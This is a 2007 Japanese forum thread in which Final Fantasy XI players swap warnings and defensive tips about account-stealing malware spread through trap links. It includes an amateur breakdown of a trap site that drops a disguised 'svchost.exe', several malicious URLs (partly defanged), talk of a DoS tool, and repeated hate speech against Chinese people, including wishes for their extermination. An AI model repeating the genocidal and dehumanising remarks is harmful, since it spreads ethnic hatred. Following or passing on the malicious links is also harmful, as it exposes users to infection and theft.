つうか、まず基本的なことを確認させてくれ

htmlのページのみを表示している限り、基本的にはスパイウェアがPCに進入する事は無いよな?
JAVAスクリプトやアクティブXなんてものを使うからこの手のワーム等をPCに進入させてしまう

次にダウンロードするだけでは問題は無く、実行ファイルを起動しメモリに常駐されなければ大丈夫
HDDからウィルスが見つかってもそれが実行されていなければ問題は無いって事だよな?
ただ、ダウンロードとファイルの起動を普通は一緒にやる

つう事であってる?


142 :既にその名前は使われています:2007/10/15(月) 14:40:43.30 ID:rkSOYpl1
>>141
まぁまぁあってる。だからアクテイブXコンポーネントは、DL時に通知する設定にしてあったら拒否れば
いいだけ、JAVAはきっておけば動作しない。ちなみに実行ファイルを起動じゃなくてスクリプトなり
コンポーネントなりをあっちで呼びだされたらアウト。
DLしてある、インスコしてある、そしたらもうアウトww
実行形式のよくある「ロリロリ幼女.zip .exe」を実行しちゃった系とは
感染経路が違う。JAVAは実行許可してあるブラウザ(種別問わず)で読み込まれた時点で
アクティブXはDLされた時点でアウト。
JAVAアプレットはオフ、アクティブXはDL通知or拒否にしておく。

なんのためにアクティブXコンポーネントに証明書なんてついてるか、って点を考えてみてよw


143 :既にその名前は使われています:2007/10/15(月) 14:46:26.20 ID:5jeF8Si1
>>142
THX
大体分かったと思う

アクティブXって物をよく知らないんだが、
exeさえ踏んで実行しなければ何て問題じゃないんだね


144 :既にその名前は使われています:2007/10/15(月) 14:50:06.65 ID:5jeF8Si1
それから、画像ファイルを踏んだら感染したなんて話をよく聞くけど、
画像ファイルはスクリプトみたいな物として読み込まれるって事あるの?
ビュアーでただ表示される物だと思っていたけど・・・


145 :既にその名前は使われています:2007/10/15(月) 14:51:40.96 ID:qY7JMJ4h
>>143はもっと基本を勉強するべき


146 :既にその名前は使われています:2007/10/15(月) 14:51:44.04 ID:8tc1ZXLJ
jpgに偽装してるウィルスだかなんだかってちょい前に流行らなかったっけ?


147 :既にその名前は使われています:2007/10/15(月) 14:56:33.39 ID:CHaMhoOs
てゆうかうちのブログにはられていたのはjpg偽装
削除クリックしようとして隣のURL踏んじゃって涙目wwwwwwwww


148 :既にその名前は使われています:2007/10/15(月) 14:57:18.90 ID:uWYBlKZL
うぃんどうずwの脆弱性かなんかだったような>JPGバグ


149 :既にその名前は使われています:2007/10/15(月) 14:58:18.42 ID:Pvh73KqA
業者も見境ないなぁ。ゲーム内で稼げなくなったら今度は本当に泥棒するとは。




150 :既にその名前は使われています:2007/10/15(月) 15:00:03.41 ID:5jeF8Si1
>>145
俺自身そう思う
つうか、勉強できる良い教材とか無い?


151 :既にその名前は使われています:2007/10/15(月) 15:01:47.71 ID:5jeF8Si1
>>148
つう事はWindowsアップデートでWindowsを最新にしていれば現在は直ってる?


152 :既にその名前は使われています:2007/10/15(月) 15:03:55.82 ID:dfrmZ1dK
>>151
既知の問題に対しては平気だと思うが、まだ露呈してない穴を突かれたらアウト。


153 :既にその名前は使われています:2007/10/15(月) 15:07:22.91 ID:bz8tbAi9
とりあえず昨日俺が践んでからの流れを書いてみる

1、ブラウザはスレイプニルでブログのコメントにあったFF関連のURLをクリック

2、タブにはIEと出てブラウザには何も表示されずウイルスバスターが「ウイルスの隔離に失敗した」と警告

3、すぐにウイルススキャンのみをし、1つ発見し隔離後削除

4、スパイウェアとセキリティホールとウイルススキャンをもう一度したが何も見つからず


これが昨日の夜の出来事
そしてこのスレを今日みつけた(´・ω・`)


154 :既にその名前は使われています:2007/10/15(月) 15:08:57.48 ID:rkSOYpl1
>>143
アクティブXコントロールを無制限に許可してる=EXEを自動でDL実行を裏でさせている。

分かったら今から手動で許可するに設定しなおすんだw大手サイトで
安全と分かってる所ならいいよ例えばyahooだったりgoogleだったり頻繁に使ってる通販サイトならね。
オレはセブンイレブン.comとかDVDダイレクトかな、そこからもちろん個人情報の流出がないか?
と問われれば100%とは絶対言えない、でも利便性とセキュアさとのトレードオフだからねネットサーフは。
ただ確実に言えるのはオレはこの方法でウイルス踏んでPC飛んだ事1回もないよブラクラもない。
ま、事前にドメインみたらチョンコのサイトぽいのは踏まないとかしてるのもあるけど。
1回だけavast!のワーニング出たかな、それだけだよw


155 :既にその名前は使われています:2007/10/15(月) 15:11:13.83 ID:FrFc9auW
ファイアフォックスでもアクティブXの設定出来るのかね?


156 :既にその名前は使われています:2007/10/15(月) 15:12:54.59 ID:sWqjwt+8
>>140
そこまでやばそうなら、俺が変わりに変更しといて教えてやるといいたいところだが、それじゃさらに心配だろうなw


157 :既にその名前は使われています:2007/10/15(月) 15:19:24.62 ID:5jeF8Si1
>>154
THX
一応、署名されたアクティブXのダウンロードはダイアログ表示、
未署名のアクティブXのダウンロードは無効になっていた

つうか、アクティブXコントロールとプラグインの実行とか、気になるもの全てダイアログ表示にして
公式HP開いたらダイアログだらけでまともに見れなくなったwwww


158 :既にその名前は使われています:2007/10/15(月) 15:24:00.28 ID:lWvB4n6e
携帯版フレンドリストとかいつになったら出るのよ


159 :既にその名前は使われています:2007/10/15(月) 15:25:22.30 ID:g+W18b1S
>>13
そんなのごく一部だろ。
フレがやられたらしいが、金目の物売りさばかれたものの
エクレアや金にならん物は全て残ってたそうだぞ。
これもバハ鯖な。


160 :既にその名前は使われています:2007/10/15(月) 15:30:04.00 ID:2/MINvwD
11日付けでmixiにURLが張られ踏む。
XP、ノートンインターネットセキュリティ2007、Bagブラウザ使用。Javaは切ってあったはず。WindowsUpdateは最新。サイトは開いたが真っ白で、PCにも何の反応もなかった。
12日、13日で合計三回ショートカットからFF接続。日曜はやっていない。
15日昼、ここを見つけて青ざめる。


161 :既にその名前は使われています:2007/10/15(月) 15:36:37.40 ID:B7tApa1p
>>159
どちらの被害もありうるってことでしょ
一部かどうかなんてことこの際関係ない


162 :既にその名前は使われています:2007/10/15(月) 15:42:15.83 ID:g+W18b1S
>>161
>や、被害逢った複数のフレが全員同じパターンだ。

まるでこのパターンしかないような口調で書いてたから否定しただけだが
否定されると何か都合悪いのか?


163 :既にその名前は使われています:2007/10/15(月) 15:48:41.39 ID:8tc1ZXLJ
うちのフレも金目の物と金だけ抜かれてエクレアとかキャラとかは大丈夫だったみたいだなぁ。
まぁ金と金目の物盗られて大丈夫だったもクソもないんだが・・・w


164 :既にその名前は使われています:2007/10/15(月) 15:56:07.31 ID:OCxmGq9L
昨日自分のFFブログにコメントで貼られてて踏む。
.jpgで真っ白だったがソースが面白いことになってた。
でもMacOSXでしかWebは見ないので何の問題も無かった。

うちのFF11専用PCはノートンとFF11しか入ってねぇw



165 :既にその名前は使われています:2007/10/15(月) 16:10:16.66 ID:xr+6TcAm
安全サイトはIE、ある程度信頼できるサイトはタブブラウザを使っているが
やばいと思うサイト専用のブラウザは何がいいかな
軽いブラウザがいいんだが


166 :既にその名前は使われています:2007/10/15(月) 16:10:23.08 ID:q1vxKjR8
このスレか向こうのwikiスレが落ちるか完走しそうになったら、
ネ実セキュリティ総合スレとか立てたいねこりゃ。


167 :既にその名前は使われています:2007/10/15(月) 16:13:15.91 ID:csK5pGd7
RMTならまだしもここまで来ると完全に犯罪
もう後が無いんだろうな奴等も


168 :既にその名前は使われています:2007/10/15(月) 16:13:28.99 ID:bz8tbAi9
とにかく
・ウイルス、スパイウェアの駆除
・パス変更

これをやればいいのかな?
間に合えば・・・


169 :既にその名前は使われています:2007/10/15(月) 16:15:01.53 ID:OpMKEtp1
>>168
駆除したあと、なるべく駆除したPCとは別のPCかPS2あたりでパスかえたほうがいい。
見つかってないスパイウェアがまたデータ盗むかもしれんからな。


170 :既にその名前は使われています:2007/10/15(月) 16:15:30.88 ID:+nv1DEJ5
もう後が無いというか、日本の法律の影響を受けない場所からやってるんだろうから犯罪とか
そんな事奴らには関係ないんじゃない?


171 :既にその名前は使われています:2007/10/15(月) 16:16:00.99 ID:B7tApa1p
>>162
うがった見方し過ぎw


172 :既にその名前は使われています:2007/10/15(月) 16:16:47.91 ID:h6EficU/
感染の疑いがあるPCはとっとと捨てて新しいPCを買うしかない


173 :既にその名前は使われています:2007/10/15(月) 16:16:48.15 ID:+nv1DEJ5
>>169
つうか、その後永久にPCでログイン出来なくないか?
見つかってないスパイウェアが入ってるかもしれないし


174 :既にその名前は使われています:2007/10/15(月) 16:17:49.52 ID:L8P1+cRg
スレチだろうけど、買う奴がいるから奴らも形振り構わず奪いに来るんだよな。
もうRMTerは一発BANでいいよ。


175 :既にその名前は使われています:2007/10/15(月) 16:20:41.86 ID:Bc+bkhyB
ま、すこしでも怪しいサイトをみたけりゃマック使うのが確実だな
いまなら中古のそこそこの機種が5000円程度
それでネットの利用には十分すぎる性能だしな



176 :既にその名前は使われています:2007/10/15(月) 16:21:01.34 ID:dsX8B3pB
それこそ回線ぶちぬいて、出荷時の状態にクリーンインストールでおkだろう。


177 :既にその名前は使われています:2007/10/15(月) 16:21:25.76 ID:+nv1DEJ5
>>174
同意
買い手がいなければ奴らの行動は無意味になる

以前はそろそろ売り手が絶滅するだろうし、買いたきゃ勝手に買えばwww程度にしか考えてなかったが、
ここまで事体が深刻化すれば買い手も購入額、購入回数に関わらず全て1発BANの必要があるだろ


178 :既にその名前は使われています:2007/10/15(月) 16:23:35.09 ID:OpMKEtp1
>>173
一度ヤバイURL踏んだ後、アンチウィルスソフトじゃすべてをカバーするのは無理だろうし
定期的にパスかえるしかないんじゃないかな?

極論になると>>172になるな、一番安全。
しかし、現実は定期的にウィルススパイウェアを駆除するしかない
それでも垢ハックされた場合は運が悪かったとしか・・・GMにいっても救済されないっぽいしな

俺もやばいURL踏んで、スキャンしてそれでも心配だったからPCからFF11アンインストールして
PS2のみでやってるし。一応業者の活動が落ち着くまでPCにFF11はインストールしないつもりだよ


179 :既にその名前は使われています:2007/10/15(月) 16:23:59.27 ID:3tKa8ncI
俺も土曜ギコナビのURLにカーソルのせると画像見られる奴で真っ白の見ちゃったがやばいんだろうなぁと思って検索やら駆除やらしたなぁ

もうまとめサイト作って中国人非難したほうがよくないか?
調子に乗りすぎだと思う


180 :既にその名前は使われています:2007/10/15(月) 16:25:22.55 ID:qSShvntL
>>174
>>177
そりゃ単純すぎってもんだろ。
例えば俺が倉庫キャラでRMTしてそのギルを恨みある奴や
不特定多数に送付したら全員垢BANすんのか?
もしくはバザー品を購入してもよい。
証拠も無しにギルだけで垢BANてのは難しい&危険じゃないのか?


181 :既にその名前は使われています:2007/10/15(月) 16:25:35.77 ID:B7tApa1p
wikiでは改ざんされる恐れがあるし
まずはテンプレ作成からかね


182 :既にその名前は使われています:2007/10/15(月) 16:25:55.87 ID:3Tq99UU+
俺のブログにも変なトラックバックあったんだよな。
FFはPSからだから安心だがフレのキャラが心配だ。


183 :既にその名前は使われています:2007/10/15(月) 16:27:03.16 ID:8tc1ZXLJ
>>179
非難しようと何しようとやってくるよ。向こうは生活かかってるしなりふりかまってられない。
対策しようと穴見つけてつついてくる。

きれいごとな言い方かもしれないけど各個人でセキュリティ意識高めて防衛するしかないと思う。


184 :既にその名前は使われています:2007/10/15(月) 16:27:56.60 ID:+nv1DEJ5
FFも某ネットバンキングみたいな感じでワンタイムパスワードとかやってくれんかな・・・

俺も出来ればX箱360版に変えたいが、パッドがな・・・
アナログスティックやボタンの配列がPS2の配列のパッド出ないかな・・・


185 :既にその名前は使われています:2007/10/15(月) 16:28:23.39 ID:g+W18b1S
>>171
関係あるとか無いとか頓珍漢なレスしてるお前だろそれはw
元レスの内容が事実に添ってないからその部分を否定しただけ。


186 :既にその名前は使われています:2007/10/15(月) 16:29:31.04 ID:DGEp1aaS
つうか、オレの中での順位が変わりつつある。
この世から消滅してしまえばいい国
第一位:中国(北朝鮮を抜いてトップに躍り出た)
第二位:北朝鮮
第三位:韓国

12億人残らず消滅してくれないかな。


187 :既にその名前は使われています:2007/10/15(月) 16:29:51.54 ID:+nv1DEJ5
>>179
wikiにしてそのサイトまで改竄されたら笑いものだなwwwww


188 :既にその名前は使われています:2007/10/15(月) 16:29:53.57 ID:OWqw2Qhe
つまりインベーション見に行けってことか
http://wwws.warnerbros.co.jp/theinvasion/site.htm


189 :既にその名前は使われています:2007/10/15(月) 16:31:15.88 ID:+nv1DEJ5
>>186
一番確実なのはあの国を人間ごとリアルから消し去る事だよな~
NA様やってくれんかなwwww


190 :既にその名前は使われています:2007/10/15(月) 16:34:31.11 ID:Ih1S+Tsm
>>180
RMTer乙
穴ばっかり突いてないでさっさとBANされろ


191 :既にその名前は使われています:2007/10/15(月) 16:35:32.85 ID:B7tApa1p
>>185
>>161
【どちらの被害もありうる】ってことでしょ
【一部かどうかなんてことこの際】関係ない

他人の報告聞いて【ごく一部】と決めつけたのはあなた
それに対してのレスが>>161
人を頓珍漢呼ばわりする前に落ち着け


192 :既にその名前は使われています:2007/10/15(月) 16:35:55.42 ID:3tKa8ncI
知らない人に警鐘鳴らす意味でもあった方がいいと思う

あとは向こうの手口も進歩するんだしそれに応じた対策とか有志で持ち寄りでもあればなお良いと思う


193 :既にその名前は使われています:2007/10/15(月) 16:46:23.24 ID:ao8hXpgH
>>168

1.他のPC/PS2でパス変更
2.対象PCの再インストール

が最良、ツールは検出できない場合もあるしね
PCが無い場合は、スクエアのサポートに電話して
アカウントロック&パスワード再送依頼かな

感染したPCで何かやろうとすると危険だとおもわれ




194 :既にその名前は使われています:2007/10/15(月) 16:47:35.20 ID:qSShvntL
>>190
は?何でもRMTerて言えば良いのか?
穴があるから指摘しただけだろ
Rmtなんかしてねーよ。だが業者からギルもらっただけで垢BANなら
冤罪で垢Banやり放題ですねw
そんなゲームしたいのか?師ね低脳


195 :既にその名前は使われています:2007/10/15(月) 16:49:17.64 ID:bW9PV5tX
もう、バザー、競売、宅配廃止でwwwwww


196 :既にその名前は使われています:2007/10/15(月) 16:49:35.70 ID:g+W18b1S
>>191
馬鹿か…ちゃんと元レス>>13と>>14読んで来い。

お前の「どちらの被害もありうる」に対して否定はしないが
元レスは「こんなケースもあったよ」みたいなニュアンスで書いてないだろ?
どうみても「エクレア、キャラごと捨ててしまうのが当然のやり口」のように書いてるだろ?
だから、その部分について否定しただけ。



197 :既にその名前は使われています:2007/10/15(月) 16:50:45.64 ID:g+W18b1S
失礼 >>14じゃなくて>>23なw


198 :既にその名前は使われています:2007/10/15(月) 16:58:42.35 ID:8tc1ZXLJ
被害の大小でケンカすんなよw


199 :既にその名前は使われています:2007/10/15(月) 16:59:17.25 ID:B7tApa1p
>>196
それじゃあ俺が馬鹿で業者で頓珍漢でいいよ

こっちのことを業者と疑うようなレスつけといて何様だよあんた


200 :既にその名前は使われています:2007/10/15(月) 17:00:20.50 ID:g+W18b1S
まあ完全に子供の喧嘩だな・・・w
すまんかった。


201 :既にその名前は使われています:2007/10/15(月) 17:02:33.91 ID:N40mmryY
そして業者の策略にはまり日本人同士で喧嘩し始めるネ実であったwwwww


202 :既にその名前は使われています:2007/10/15(月) 17:04:31.26 ID:rkSOYpl1
小日本小日本喰糞喰糞^^


203 :既にその名前は使われています:2007/10/15(月) 17:11:53.91 ID:wEskqzSY
フレも被害にあい、さすがに怖くなったからPOLのパスワード設定を
「入力して保存する」から「設定しない」に変えて、ログインするごとに
入力する方法に変えたんだけど、今まで保存されていた場合、すでにどこかのファイルに
情報が入っちゃってて意味なかったりするのかな。
特別にどこかのファイルを消す必要があるとか知ってる人いたら教えてほしい。


204 :既にその名前は使われています:2007/10/15(月) 17:13:20.94 ID:sWqjwt+8
クッキーみたいに?


205 :既にその名前は使われています:2007/10/15(月) 17:18:06.74 ID:VrfuxxCC
おいィ?ネットポリスは何しつる訳?


206 :既にその名前は使われています:2007/10/15(月) 17:19:53.28 ID:8nd9bHW4
警察は真面目に動くの?
「は?ネトゲ?キメェwwwwww」な対応しかしないの?


207 :既にその名前は使われています:2007/10/15(月) 17:20:49.57 ID:C6HFP7H2
先鋭が中国行って、片っ端から鈍器でガツンとやってくればいつかは終わるさ


208 :既にその名前は使われています:2007/10/15(月) 17:23:48.36 ID:UbJ805qK
最近URLが張ってあって「両手武器が強くなってSTR=攻1 DEX=命中1などの検証~」とか
「エキサイトブログのほうを閉じたのでこちらのほうでまたFF11Blog再開しまーす!リンクお願いします」とか
IPサーチすると北京と上海ばっかりwwwwwwwwwwwwwwwwwwwwwwwwwwww

ほんとなんとかしてほしいなぁ。
しかも似たようなリモートホストだったなぁ全部


209 :既にその名前は使われています:2007/10/15(月) 17:30:09.16 ID:LjSCbTSm
中華を皆殺しにしろまで言わん
アノ国をネット封鎖しろ


210 :既にその名前は使われています:2007/10/15(月) 17:37:00.61 ID:K4aIZTfZ
取りあえずネットやメールはMacでやれば問題ないって。
10万くらいのCore2Duoのノートブックで良いからさ。

HDの別パーテーションにXPやVISTAインストール出来るから
Winで作業する時はそっちで起動(FF11も普通に出来る)
ネットやメールや怪しいサイトはUNIXベースのOSXでアクセス。

アプリやゲームその他すべての面でWindowsのが今や上だけど
ことネット利用の安全性に関してはMacOSのが上だよ。



211 :既にその名前は使われています:2007/10/15(月) 17:38:42.14 ID:g+W18b1S
コメントの内容がFF関連だとしても、
自分の記事なりに直接関係する内容でなければ警戒するようになったな。
昔は気にせずURLクリックしてたけど…ほんとめんどいわw


212 :既にその名前は使われています:2007/10/15(月) 17:47:03.90 ID:s21KZTNg
jpgが危ないってことはフォト2とかの画像うpサイトってかなり危なくないか?
速攻攻撃対象になってそうなんだけど


213 :既にその名前は使われています:2007/10/15(月) 17:47:24.90 ID:82eWdTgD
ソースチェッカーとかいうの見つけたんだけど
踏む前にこういうのにかけてみれば
被害は防げるんかな


214 :既にその名前は使われています:2007/10/15(月) 17:50:46.74 ID:4xFQ67qj
>>165
opera



215 :既にその名前は使われています:2007/10/15(月) 17:54:56.00 ID:/fxEx+BR
被害に遭ったら、失ったアイテム補償などの救済はあるのか

①警察は、不正アクセスの被害者はサーバー管理者であるゲーム運営会社です、
とHPではっきり言っている

②■eはもちろん自ら被害者として告発はしないし、不正アクセスに関して、
警察の捜査等により事実関係が明確になれば、弊社は、お客様が被害に遭わ
れたと確信を持って対処できるのです、と言う

①と②を合わせると、理屈上は絶対に泣き寝入りしかない理屈になる

補償を行っていると言うリネの運営なんかはどう動いてるんだろうね



216 :既にその名前は使われています:2007/10/15(月) 18:05:28.26 ID:mtBUfr0j
ドリキャスでネットすれば安心だぞ


217 :既にその名前は使われています:2007/10/15(月) 18:06:02.71 ID:6xAcG0G9
このスレはアゲルべき


218 :既にその名前は使われています:2007/10/15(月) 18:09:39.67 ID:8QSEwqs6
>>210
デュアルブートは重くないか?
そう思ってたんだけど、今は違うのかしら


219 :既にその名前は使われています:2007/10/15(月) 18:14:03.99 ID:SoRTAx6m
FF11史上の最も強い日記
詳しい情況は見る
http://tinyurl.com/35vg2o
75 名前:既にその名前は使われています[] 投稿日:2007/10/15(月) 18:01:07.88 ID:JIMp2RWF
FF11/FFXI全く新しいです武器.防具一覧
詳細はリンク先ページを参照下さい。
http://tinyurl.com/33oht5


踏んじゃったんだけど


220 :既にその名前は使われています:2007/10/15(月) 18:18:19.75 ID:8tc1ZXLJ
>>219
だからURLは削れと・・・二次被害出るぞ


221 :既にその名前は使われています:2007/10/15(月) 18:18:37.48 ID:Bc+bkhyB
>>210
ネットとメールするのにそんなんまでいらんよw
5000円の中古で十分。マカーは割りと物持ちがいいのが多いから状態も悪くないのが多いしね


222 :既にその名前は使われています:2007/10/15(月) 18:19:44.26 ID:HnIOHfEY
1 名前:既にその名前は使われています[sage] 投稿日:2007/10/08(月) 15:13:00.62 ID:qbkt1Ge6
=================================
注意:ジョブwikiなどが業者に狙われています。
=================================
なんかアカウントハック目的の業者うざいのでネ実のマンパワーでFFXI系wikiをまもれ。
とりあえず現在、tinyurl系がうざい。 うっかり踏まないように。
あと一般のブログに見える業者のLivedoorブログページに一度飛ばし、
アルタナの神兵情報などを載せて「詳しくはこちら」からハックHPに飛ばす手法もある。

怪しいURLは先にこれで調べる!これが勝利のカギだ!
■aguse.net
http://www.aguse.net/

現在防衛すべきwiki
■モンク道
http://mnk4.no-ip.org/?FrontPage


Wikiスレの>>1に書いてるサイトから危険度をチェックすれ、きっと笑える結果が待ってる


223 :既にその名前は使われています:2007/10/15(月) 18:25:39.00 ID:nU3SrfAM
やつら、自炊スレにまで転送アドレス貼りにきたよ。
aguse.netで調べたら案の定China・・・


224 :既にその名前は使われています:2007/10/15(月) 18:33:39.36 ID:8tc1ZXLJ
aguse.netって便利だな。FF関連のリンク踏むときはここ通して調べるといいのか・・・。
調べようとして間違って踏んじゃったりする可能性が一番怖い・・・


225 :既にその名前は使われています:2007/10/15(月) 18:33:46.15 ID:xBJ5t7Gd
なあアカウントハックって.exe 実行型?
それによって対処の仕方とか考えるぜ


226 :既にその名前は使われています:2007/10/15(月) 18:35:08.72 ID:C6HFP7H2
田代に踏みに行かせるは・・・


227 :既にその名前は使われています:2007/10/15(月) 18:42:47.04 ID:aFtld5Tu
冷静に考えてだな、汗水たらして必死に働いたのに
元々内陸部は土地が痩せているし、近年急激な環境破壊が進んでいて
ろくな収穫が無い。
だから沿岸部へ出稼ぎに行くわけだけど、
椅子に座ったまま上司から指示された通りにパソコンいじってれば
お金がもらえるんだから、もう農家なんかやってないで
RMT業者の手先になっちゃったほうがよほど楽して稼げるんですよ。
業者の侵攻が止むわけ無いわな。


228 :既にその名前は使われています:2007/10/15(月) 18:44:32.38 ID:8I8GSgcK
九五と二百十九は削除依頼してきたが 
任意削除なんで削除してもらえるかは不明。

古いデータだけど 
ttp://arena.nikkeibp.co.jp/article/col/20050510/112145/
ノーガードでネットつなぐとこんなことになるって例。

現在の現象はモスレにはってあったこれがわかりやすかった
ttp://jp.trendmicro.com/jp/threat/trend/web-threats/

PCでFFしなくても 銀行の口座やクレカ
他の会員制サイトのIDとパスなんかも抜かれる可能性があるから
フリーのスキャンだけでもしといたほうがいいぜ?


229 :既にその名前は使われています:2007/10/15(月) 18:45:39.21 ID:W/MTsceV
ここで聞くことじゃないがマルチ張られてたらアンカ飛ばして警告したほうが良い?


230 :既にその名前は使われています:2007/10/15(月) 18:49:38.04 ID:e2/Ys8hX
PS2でやれ


231 :既にその名前は使われています:2007/10/15(月) 18:54:42.83 ID:fWWms7Ms
>>220
それが目的だろ、巻き添えにしたいだけ


232 :既にその名前は使われています:2007/10/15(月) 18:54:50.93 ID:BV3pGnPR
>>228
おまえさん、削除依頼だすとこまちがってるw


233 :既にその名前は使われています:2007/10/15(月) 19:02:31.98 ID:HnIOHfEY
上で踏んでしまった連中見てると「自称ネットに慣れてる」「俺は大丈夫」と思ってる奴らの多さがよくわかる。
他人事じゃないのにな。


234 :既にその名前は使われています:2007/10/15(月) 19:03:38.20 ID:GK+JQ8M3
PS2はマクロのバックアップを取れないというのが致命的すぐる


235 :既にその名前は使われています:2007/10/15(月) 19:06:23.64 ID:nE6qcWLq
中国人は他国に迷惑かけすぎだろ


236 :既にその名前は使われています:2007/10/15(月) 19:07:33.41 ID:dsX8B3pB
妹がマクロをPS2からPC版に移すにあたって、写メでパシャパシャやってたのを思い出した。
手動なのは諦めるしかないんだと思う。


237 :既にその名前は使われています:2007/10/15(月) 19:16:52.61 ID:GK+JQ8M3
メモリーカードにファイルとして出力くらいできてもいいとは思うんだけどなー


238 :既にその名前は使われています:2007/10/15(月) 19:18:20.57 ID:C6HFP7H2
中国人なんか死んだら捨てるくらいのスタンスでいいんだから
他国に迷惑かけてまで生き長らえようとしなくていいのに^^;


239 :既にその名前は使われています:2007/10/15(月) 19:20:35.40 ID:v/fxvPpp
いまphotoIIを開いて閉じると音が鳴る。
これって何か仕込まれてるんだろうか。


240 :既にその名前は使われています:2007/10/15(月) 19:20:48.18 ID:W/MTsceV
あの国の人間て爆発的な速度で増殖してるからな。
まじでゴキ以下だわ。


241 :既にその名前は使われています:2007/10/15(月) 19:21:50.51 ID:Tlw1uPPJ
リンク貼ってよ

半角板で判定してもらおう


242 :既にその名前は使われています:2007/10/15(月) 19:28:27.95 ID:8FldlluB
これ2chでURL貼られてたら貼った奴逮捕できんの?
鯖スレで晒されてる奴の情報とか偽って貼ってた愉快犯がいるんだが


243 :既にその名前は使われています:2007/10/15(月) 19:39:57.36 ID:DL6f46Yu
このスレ見てとりあえずウイルスバスターで
IDとパスをweb、メール経由で送信ブロック設定した


244 :既にその名前は使われています:2007/10/15(月) 19:46:33.56 ID:Bc+bkhyB
プロバイダ法に違反しそうだけど管理人しだいかな


245 :既にその名前は使われています:2007/10/15(月) 19:50:13.91 ID:s21KZTNg
tp://ff11-photo.gamers-online.net/joyfulyy/joyfulyy.cgi


246 :既にその名前は使われています:2007/10/15(月) 20:44:54.65 ID:CHaMhoOs
ほんとどうしょうもないな中国人は・・・


247 :既にその名前は使われています:2007/10/15(月) 20:48:04.27 ID:v/fxvPpp
PhotoIIはラウンジの鑑定人によると無害らしい。
ソースチェッカーでもほぼ安全という結果だった。

別の要因で鳴っただけかもしれないのでお騒がせごめん。


248 :既にその名前は使われています:2007/10/15(月) 20:52:40.86 ID:OpMKEtp1
ネ実のスレにも罠URL入ってるシナチクがいるな。
マジで中国をネット封鎖してくれ、地球にいるゴキブリだよ奴らは


249 :既にその名前は使われています:2007/10/15(月) 20:54:39.75 ID:OpMKEtp1
ちなみにそいつのIDはID:JIMp2RWFな。
見つけたら即あぼーん汁。

連レス失礼。


250 :既にその名前は使われています:2007/10/15(月) 20:56:02.54 ID:W/MTsceV
>>249
金策スレとかにも張ってるなそいつ


251 :既にその名前は使われています:2007/10/15(月) 21:01:30.47 ID:N/NKXwEE
IEとは独立したOS側(win)の脆弱性をつくurlも存在するようで、
とりあえずOpera,Mozzila使用者も油断は禁物かもしれません。
ActiveX、VBScriptが無効でもjavascript+OS脆弱性で感染する可能性があります。

11日付近に張られているurlは割と古い脆弱性を標的にしているようなので、
windowsupdateとウィルス対策をきちんとしていればある程度は防げるかも?
もちろん油断は禁物ですが。
割と多くのアンチウィルスソフトベンダが対応しているみたいなので
リアルタイム(オンアクセス)スキャンやインタースキャン等なら防げるのかもしれませんね。
(今後も安心という保障は全くありませんが)

windowsupdateを無効にしている人やリアルタイムスキャンを(重いので)無効にして定期スキャンのみにしてる人、期限切れで定義ファイル更新してない人はベンダーhpの無料オンラインスキャンを試してみるのもテです。



252 :既にその名前は使われています:2007/10/15(月) 21:01:41.69 ID:3tKa8ncI
シナチク警戒上げ


253 :既にその名前は使われています:2007/10/15(月) 21:12:30.26 ID:S9ceHPEO
田代砲って有効かな?


254 :既にその名前は使われています:2007/10/15(月) 21:16:17.45 ID:dsX8B3pB
初心者スレにもなんか来てた。
h ttp://www●k5dionne●com/ffxmmi
例によって危険URLリストに載ってた。


255 :既にその名前は使われています:2007/10/15(月) 21:20:31.97 ID:cG0A2xWz
死な畜がログイン出来ない様にチャイナからのアクセス封鎖すればいいじゃね?w


256 :既にその名前は使われています:2007/10/15(月) 21:32:02.24 ID:c9x2X3gl
>>218
ディアルブートがなんで重くなるのかが気になるw


257 :既にその名前は使われています:2007/10/15(月) 21:39:06.09 ID:kH8lrXBT
>例えば俺が倉庫キャラでRMTしてそのギルを恨みある奴や
>不特定多数に送付したら全員垢BANすんのか?

どこの誰かも分からない奴から送られてきたギルを、そのまま貰う様な奴はBANされていいんじゃね?
つか、その前に送付元のお前がBANされそうだけどなwww



258 :既にその名前は使われています:2007/10/15(月) 21:50:26.67 ID:fJZUO+Gb
>>214
Ver6以降、使いやすくなったよな
昔は日本語さえなかった


259 :既にその名前は使われています:2007/10/15(月) 22:04:39.01 ID:LM2abMLO
>>256
WindowsにLinuxが合わさると頭がおかしくなって死ぬ


260 :既にその名前は使われています:2007/10/15(月) 22:14:32.17 ID:Oid4nZ/A
とりあえずテンプレは>>222のサイトを載せるべきかね


261 :既にその名前は使われています:2007/10/15(月) 23:41:58.89 ID:dsX8B3pB
aguse.netとソースチェッカー系からどっかお勧めのやつと、
あとなんだっけ、リネージュ資料室のセキュリティ対策を乗せといたらいいんでないかな。
http://lineage.nyx.bne.jp/misc/security/


262 :既にその名前は使われています:2007/10/16(火) 00:11:00.60 ID:hJRBS4Zx
とりあえず、攻撃収まるか対策されるまで、
FFやるPCではどんなリンクも踏まないのが一番手堅い





263 :既にその名前は使われています:2007/10/16(火) 00:56:44.04 ID:gf+9scve
まだ途中なんだけど >>95 の罠サイトを解析してみた
※この書込み情報自体もまず疑って掛かってください。間違っている可能性があります。
※もっと、詳しい方の添削をお願いします。

tp://www(ドット)xiaoriben(ドット)net/FFXI/index.htm

index.htm (frameで呼出)
 ┣ wz.htm
 ┗ wu.htm (iframeで呼出)
    ┣ vip.htm
    ┗ kiss.htm

vip.htm のバッファオーバーフローは恐らく↓かな?
もしこれなら 『BaoFeng Storm』 と言うソフトウェアがインストールされていなければ(MPS.dllがなければ)平気ぽい
ttp://www.symantec.com/ja/jp/enterprise/security_response/vulnerability.jsp?bid=25601

kiss.htm は、恐らく↓の脆弱性をついた物だと思われ。2006/04 のだから普通に Windows Up Date をしていれば問題ないはず
ttp://www.microsoft.com/japan/technet/security/Bulletin/MS06-014.mspx
kiss.htm は "ser.exe" というのをダウンロードさせて "svchost.exe" にリネームして 実行していると思われ
ser.exe は、残念ながら自分には DL できなかったので、動作は不明(恐らくダウンローダだとは思う)


264 :既にその名前は使われています:2007/10/16(火) 01:08:03.51 ID:ls39jOq+
f2c,exciteへの爆撃がヒドイ

ふつーのスパムとかトラバ嵐と違って結構紛らわしい本文なので注意が必要です。

↓サンプル
------------------------------
エキサイトブログが壊れた模様です
前々から不満もあったのでこの機会に移転しちゃいます
××tp://mbspro6uic■com/yutangff/ffzuotu■jpg

-----------------------------------

あやしいサイトはソースチェッカーで調べましょう。
ttp://so.7walker.net/guide.php

もっと厳格に言うと、上記ソースチェッカみたいなリンクも、分からなければ踏まないほうがいいと思う。

